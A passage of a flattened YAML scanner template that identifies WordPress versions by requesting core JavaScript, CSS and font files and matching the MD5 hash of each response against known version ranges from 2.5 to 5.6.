5.4.4 - dsl: - - "(\"7cc967183c11b5c46e0cb2a83132fe9a\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d590e45d50e3cc8d6698e9566bff6bc9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/clipboard.js" - matchers: - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"945fc983fe7bb6fbf3d3ad76f5246b11\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d49273842035439fc99acc628cd64c46\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/fonts/dashicons.woff2" - matchers: - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"e3ce3e0415834a28cb23ac40d5ef1acc\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4db6aca14e3ac2d227e5caa4b7dbc8b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/nav-menu.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"2975b2cb1f865538da0f7056f3f267f5\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"f5ae9e78b47c5096b10afeb0e1e951e5\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"2018071a5a024a8a8c56f793c415e4c1\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"f0b45151e04c6dc6061556c6e889431d\" == md5(body))" - - type: dsl - name: 4.2.4 - 4.2.29 - dsl: - - "(\"e4fc225947f25daa1cc8e153caabf98a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.3 - dsl: - - "(\"d6facb8a8fe8d2ed1cdef140d006942a\" == md5(body))" - - type: dsl - name: 4.0.2 - 4.1.32 - dsl: - - "(\"c80084b98b0ee2a45e17dd3eef229d8d\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.1 - dsl: - - "(\"1ac435f167ec9c539cf405e139fc9a45\" == md5(body))" - - type: dsl - name: 3.8.6 - 3.9.33 - dsl: - - "(\"44f78808e404a41a0335959ae3e71d4c\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.3 - dsl: - - "(\"d1511ebb0763771ef8704b71a1abf1f0\" == md5(body))" - - type: dsl - name: 3.7.6 - 3.7.35 - dsl: - - "(\"2c6d5b682afadc134de7b46b1d201141\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.5 - dsl: - - "(\"a784f15f81f5a7dfdeda227d1ae8bd02\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"6b451d41fb408bf92f39a2c86b2fc544\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"c9058b907f0a2b1a81885047ef33660c\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"7b471a387caf8b12d1f852c1b8bc9164\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"2163970d52136c60d14dd9e2a911bdad\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"99dc2904606935a86b4e09f2fccd3158\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"404825b185b9d372a012af2d0522c4cc\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"4ebe903cffb8b10b75569a121e899b53\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"ec9f05e576f73e06177bfbce15ae9747\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"1495197fcb73221ecc07015adb0f97a6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"32237fd4dbc69f6bbf3b7f7496cc674f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ef806de6ca6f1220a40137423a090d32\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"88ebb8aaac396aa64835549f8812141b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/handlers.js" - matchers: - - type: dsl - name: 4.6.6 - 5.2.9 - dsl: - - "(\"7a8494f68ff136d5bf92a075fa61dfe0\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.4 - dsl: - - "(\"06e4d64e099466eaa3185f1850884821\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.5.23 - dsl: - - "(\"0f6712d2c464a0d1004730a681d535b1\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.8 - dsl: - - "(\"c9d857501549cabf90a9c546f0556729\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.17 - dsl: - - "(\"9798444b97233bb341b19f374f85c11c\" == md5(body))" - - type: dsl - name: 3.9.19 - 4.1.32 - dsl: - - "(\"e7ba5e91add4b63a869cfc89fba4e450\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.20 - dsl: - - "(\"d39498ac697640f306f8a37ac4f9ac30\" == md5(body))" - - type: dsl - name: 3.8.21 - 3.8.35 - dsl: - - "(\"224c433a1b7108849dabd9c4b28a5820\" == md5(body))" - - type: dsl - name: 3.5.2 - 3.7.20 - dsl: - - "(\"878e0b76338a31dd288a1ed089cb6a4f\" == md5(body))" - - type: dsl - name: 3.7.21 - 3.7.35 - dsl: - - "(\"5a7bd4909e9b554d9d6d14d8e3672f72\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.1 - dsl: - - "(\"1d74c489a7777d0fa6b226eccb151140\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"95d55f5d43ce4423cfeb1efcf61f6bcc\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ab233bf82692d9cc49208b8fee6ee3fa\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"326108da685f0873de9fc07143688f1e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e7915174a661686126042ac03ae03ed4\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4fb1cd09a97e8c35fec738f6cdab3b99\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/comment.min.js" - matchers: - - type: dsl - name: 4.3 - 5.2.9 - dsl: - - "(\"8f3603ed0d77c4a1ae8f82dbd3159ed9\" == md5(body))" - - type: dsl - name: 3.7 - 4.2.29 - dsl: - - "(\"38ff692f79a3e57df9b9192a9e43b4ea\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"69354baaaebfb1acc18bbdd9b2b1fdb8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3146fd138614355e041e261a4294dc23\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"284349b341676993d9505326abc1f869\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"17e8c1774aa7ebd6e18181b77804f763\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.min.js" - matchers: - - type: dsl - name: 3.7 - 5.0.11 - dsl: - - "(\"8bc5ca12fa38a607d5af2181311b7a5b\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"927b30f924f2e11a7a78f63bb8d54393\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f037e26c97a0b05a4acc67e8cfeee01b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ba88585b7e0465b5de31f14e5a9aa60c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"31c250b54ebc48820839657f0bf24049\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/password-strength-meter.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"1aaa74a24aef982b82498717c1d1e6d1\" == md5(body))" - - type: dsl - name: 3.8 - 4.5.23 - dsl: - - "(\"3185f27c8fa4123db79a1d6de055c9d7\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"66ceeaf9fb0d3e36069cb2a5b4537787\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"7ffac3719681634d55315bb7020f0c35\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"831a0bdbf910b4139812e1327c992655\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a1dfc4ad5828bcc09702a4e6f1365550\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"f9241f23581e39fc27e2542e36240eac\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"77395fe1e3d510014a30d65a1464d5bb\" == md5(body))" - - type: dsl - name: 3.8 - 4.7.19 - dsl: - - "(\"4cc64266f1b35a86c63cc1b2c42f7306\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"d39bc622e41df37d3f5e2e8fd20df836\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"a1db9e45185be361561f131088b9637b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"015e26faffb2e80008b37b867a15a3bf\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"97f0a4cdbc02ea3e9875ffa2ec6a0337\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"4b6388358177afb0bb33fe7bf256e3b4\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b4f6de1adf243fb1c4ca11109ca8358b\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7e0f2194505d5542a2b80b0f0f08887c\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"3805f522ae8f28cc529ae905ccede61a\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"92121be15064830078f19c7f912bc5f9\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"58a57f957959b2418cc05b8df844f546\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"52d5d3f67a30c1ce0f451f08aa5b97ff\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"de06009e78fc399ac9a91a8f59cd8e07\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5a621bf06d20c5c3572adbc7d71f2b97\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/code-editor.js" - matchers: - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"4368208ec74f238fc80ef7dc47b2aba6\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"776a99fab6e282246f5133bc46d0087e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"48424898ce3f9ea8bb373f8653282650\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ac8c9bc9b09d4fdf6bbf06313403eeeb\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"a4f21e1c4ea627dfbd09891525f9eef1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/plugin-install.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"46ac03875245e24a0d1be489b6cb4c2f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3229e9c737c2c9a012354905b57df8da\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7129ef20998c3f2812fec0a81fd4f705\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"83cad000ff1742f350cbf5263cdea97e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7a6211c90a9364fa26b36f9866d53e9e\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"e976956cebb7ba13ce258a9d2cfa8dc3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"4c34cafa3f097dfd421dcc58356583e5\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"50652da46fc48b21ad901e98149bcd0c\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"19f4f7ff991851e77513e7d65c6b0430\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"783248774594b29ab9ebf6de3c9a38db\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"baba780d78f5d62abc5aad91f07d0c46\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"c10e07ae10cf119ed6c90ab69428e48d\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"304eb11b47e86474942ddb5d2f6c5c91\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2a7c386a71ce6d34ef8dd27a5bb6ffec\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b05faafd50075d11d8a5771c0d489b09\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4f051762ba5719d75fa25627517bea54\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-ajax-response.min.js" - matchers: - - type: dsl - name: 4.7 - 4.9.4 - dsl: - - "(\"d37497d8ac9cc91eacc91b76cbff30cc\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"055515cf4b20352a05672b64161f8a02\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"5e0c8cadb7abf2ef05fbb9c04f2513f5\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"f64f062c6a647e25c7fe883edb139121\" == md5(body))" - - type: dsl - name: 4.2 - 4.3 - dsl: - - "(\"6243173bbe7318aa7b1702a90c4b0ccb\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"c97811c969982d3ec60a885c16333372\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"9bf9c718c9e841007b73e1f8194857b5\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"20d3d94221f3642fe34a6e578c435dcb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"53941ae215227db2556187ffa881e4ad\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e42f27d6179a5d518c8a5fd7c6685926\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a5a0ff7a47fe825bc38732ef1a9b530f\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"be4b510a3e27fc2ea617dfe8d10530fe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"00c7a8bf8a43b2a6342ae12d8014b357\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"4c62cfc657f2833b0ec9aef2aceda18d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"093f88e78124c68bbc7f81cc9664985e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9909906d58e1ba6307562901842b0f36\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"67cb8b12c345e8450f290f84bf99c983\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/nux/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"2988ea994f3223b637ed87efb015941a\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"fe929a23a43a921c573d6dec065f4697\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2d2b907716b25ae5cd508979a8eeacaf\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4cddab9fc231f895027cdcd60ff893ad\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"04343da85c5e00bae45912a244abffb3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags-box.min.js" - matchers: - - type: dsl - name: 4.7.3 - 4.8.15 - dsl: - - "(\"abaa02b7bdeb06985ca76e06968b3f25\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"b1a623391a6e45e237c884963c3d86c5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"1c02ad1f8935c4d4dce96815368a92e6\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"a446052ae0cf9947db74a78d2dfd1b1f\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"e5824b6ec80b938c3c17d7a19e78d9a9\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"01b149cd42ae563cc462f7e81384da3d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"096b6a30f90cb435d1be8013ddc685ba\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6213cd28dc4288286091b04c2c276e7e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"580ffdf678912278549e642083a40302\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"6c16b4618749725b12fe13abb7c42b2a\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"dc0f235b74febea2c205db39d7359331\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/clipboard.min.js" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"aaae8ad0eeed6275f0ef60bcc496c4fc\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8e6f346d35a9ca3d1189d623fff51b1e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"28a0a9788fc1686ef67f7cdd72b8626d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"bbe1c0df780d9eb632ffa1bf16a1fa40\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js" - matchers: - - type: dsl - name: 4.7 - 5.3.6 - dsl: - - "(\"bbe31109bb4a2955ac73c0b0ac1e8d8c\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7dc53d12625ab07aae053c42d581a859\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d2b7eca9a8ae108ab66e5727394d236b\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"d4d46a49f3589ec1c136ab912a2da7ca\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b381c35db3e778ce91ddbf4a181d3428\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4513090604bf922d4ea86f931b979d8d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.3.6 - dsl: - - "(\"665ee57d23f6e1b6539fd1b0e62d31ab\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"bbdbfb09f97760f162e5e9b84733f059\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d4bbce6a05abc15f6708fa9bc8cc5f1e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.3.6 - dsl: - - "(\"720f7773fc0b0a8d79d4f3fc89658c1e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"27c923c8f48e2d0888c43528fa449921\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d52e2371982ef4384ca54592d96e64d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/masonry.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"5420b6516c14245b504e7240a8310f2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"69717d4569676f401e97dcec54f10ebc\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"6cb8bb7d4daad1989037e36a0cf08e01\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"c54e75edf5cbaf412bc16ba4145f6032\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d58f7afc0296717c2a7a93b01b569b40\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3b3fc826e58fc554108e4a651c9c7848\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imagesloaded.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"d0c2c0d7e37652e66657c8c8d6376442\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"7e97ab52c3df75e9053002bb59f2cdd5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b89ed002fd8fa08062ac8018e5416432\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3a56752b736635bf69cb069b8818cbfd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-auth-check.js" - matchers: - - type: dsl - name: 4.5 - 5.0.11 - dsl: - - "(\"99500dd54adc76769e1a798a9725d765\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3fa71c823bf88630a96d37a0ce1ba695\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"a28190f5ed5d6bfa0702e414b65a2156\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"f1d3e9e205b2c0fecfd16283630f1a2b\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"a72545bc4f0ec2779a259c397112efd5\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"d92e8027e527bd17fad278c48962d397\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"76d4ccd556604992cb9380661a893995\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"6a7bedfefa2ca4e2dd8dc7075d5b1363\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/admin-bar.js" - matchers: - - type: dsl - name: 4.3 - 5.0.11 - dsl: - - "(\"d97a1899a7f641e693928f5a47c33de4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"33030beb6f04ff00e3921848ba5bbf48\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"0f097d201cb02ea92c179103eae598e7\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"25692c16854d4f5fd7be2ff45a825da9\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e3614ae78ac77f5553cd2cea4fa45e4b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"87155dc1915f0d675ab45859c63c29eb\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"af5814becbee54d645db60be9ad5c3d4\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"49282a3221d1602842f7b8387fd8c7fc\" == md5(body))" - - type: dsl - name: 5.1 - 5.3 - dsl: - - "(\"6de7978f0a6608308e9156f4a357ce26\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"d2a25830f7004da7b426e628e4d3642a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c63460232611aa5c8aa280b134df07da\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"a50de863f3edfff3a0f8a3e59a4070cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/password-strength-meter.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"2847576ec45293ab96dc0030974e2629\" == md5(body))" - - type: dsl - name: 3.8 - 4.5.23 - dsl: - - "(\"4d912846975670c9e2232a19ef7bb41b\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"9d7b4897e430c5470062141631ddf6cf\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"21310235a8b2671858df84db50a44cb3\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9fd543dc193265cafad84bd8a0d7f34d\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"5dabf5092e542062317b20b411e353ad\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"e95f7bfdde679787ce1dfa9ec54ea0fc\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"12680dac419ded545d7f0759cdef683b\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"733ef96794bb51fc1d65de2df4938827\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/word-count.js" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"5c34b03b6ec23142fc52a77a51dbd00a\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"7717109f8797a1b6cffcaccd2f69181f\" == md5(body))" - - type: dsl - name: 4.3 - 4.6.20 - dsl: - - "(\"40855d5cebe963ddaa0f92f1f5aeebb9\" == md5(body))" - - type: dsl - name: 3.8 - 4.2.29 - dsl: - - "(\"66256995400e51a5f931a11bc11e1e4e\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"1f1fbcd7486060c4dbfdea32433cce24\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"a74398b6c7a69d86c66f1e2c2e763a36\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"1c50ad62c2afa2b6a3b27f6389aa4f00\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"8041d069276b892b86066ef48173c94a\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"a4dc4685332216c99b5efbcebf141d1a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e186134a25d7bf838c1cbb8dc3c10430\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"cb0d666642291b86e71d86f8fc85b196\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-custom-header.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"6e62551d535dc3b007870e89f881ee21\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"3e2d55e5318d81a5281421f688e58323\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"284b8547296847f3521f043cf87cdb34\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b6e71eabf6639d3cb46e2078d8467161\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"7f2b2cbe2196da8a4cd3ba7ecebd37bc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-loader.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"3735895ce4bc1061b033b00ddadc22de\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7abf57ccc77b463cec220a6606154bc5\" == md5(body))" - - 